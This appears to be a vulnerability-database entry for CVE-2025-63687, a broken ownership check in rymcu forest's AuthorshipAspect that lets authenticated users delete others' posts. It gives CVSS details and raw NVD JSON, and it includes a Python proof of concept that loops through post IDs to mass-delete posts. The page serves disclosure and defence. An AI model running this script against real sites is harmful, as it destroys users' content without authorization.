Security Vulnerability Report
中文
CVE-2025-63687 CVSS 6.5 MEDIUM

CVE-2025-63687

Published: 2025-11-07 16:15:42
Last Modified: 2026-01-21 21:05:35
Source: [email protected]

Description

An issue was discovered in rymcu forest thru commit f782e85 (2025-09-04) in function doBefore in file src/main/java/com/rymcu/forest/core/service/security/AuthorshipAspect.java, allowing authorized attackers to delete arbitrary users posts.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:rymcu:forest:*:*:*:*:*:*:*:* - VULNERABLE
rymcu forest commit < f782e85 (2025-09-04)
特定版本需参考官方GitHub仓库的commit历史

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-63687 PoC - rymcu forest 授权绕过删除任意用户帖子 import requests import json # 配置目标环境 TARGET_URL = "http://target-website.com" LOGIN_URL = f"{TARGET_URL}/api/login" DELETE_POST_URL = f"{TARGET_URL}/api/post/delete" # 步骤1: 登录获取认证token def login(username, password): session = requests.Session() response = session.post(LOGIN_URL, json={ "username": username, "password": password }) if response.status_code == 200: return session, response.json().get('token') return None, None # 步骤2: 删除任意用户帖子的PoC def delete_arbitrary_post(session, victim_post_id): """ 由于AuthorshipAspect的doBefore函数未正确验证帖子所有权 攻击者可以删除任意post_id对应的帖子 """ headers = { "Content-Type": "application/json", # 添加必要的认证头 } payload = { "postId": victim_post_id # 目标受害者帖子的ID } response = session.post(DELETE_POST_URL, json=payload, headers=headers) if response.status_code == 200 and response.json().get('success'): print(f"[+] 成功删除帖子 ID: {victim_post_id}") return True else: print(f"[-] 删除失败: {response.text}") return False # 主程序 if __name__ == "__main__": # 使用攻击者账户登录 attacker_session, token = login("attacker_username", "attacker_password") if attacker_session: # 遍历尝试删除多个帖子ID for post_id in range(1, 100): delete_arbitrary_post(attacker_session, post_id)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-63687", "sourceIdentifier": "[email protected]", "published": "2025-11-07T16:15:42.383", "lastModified": "2026-01-21T21:05:34.847", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An issue was discovered in rymcu forest thru commit f782e85 (2025-09-04) in function doBefore in file src/main/java/com/rymcu/forest/core/service/security/AuthorshipAspect.java, allowing authorized attackers to delete arbitrary users posts."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-863"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:rymcu:forest:*:*:*:*:*:*:*:*", "versionEndIncluding": "2025-09-04", "matchCriteriaId": "53C995E6-F16B-4E65-BEA8-2155D74E3320"}]}]}], "references": [{"url": "https://gist.github.com/LockeTom/564d5be6b75bb64d120daed96d74ec9c", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/rymcu/forest/issues/193", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.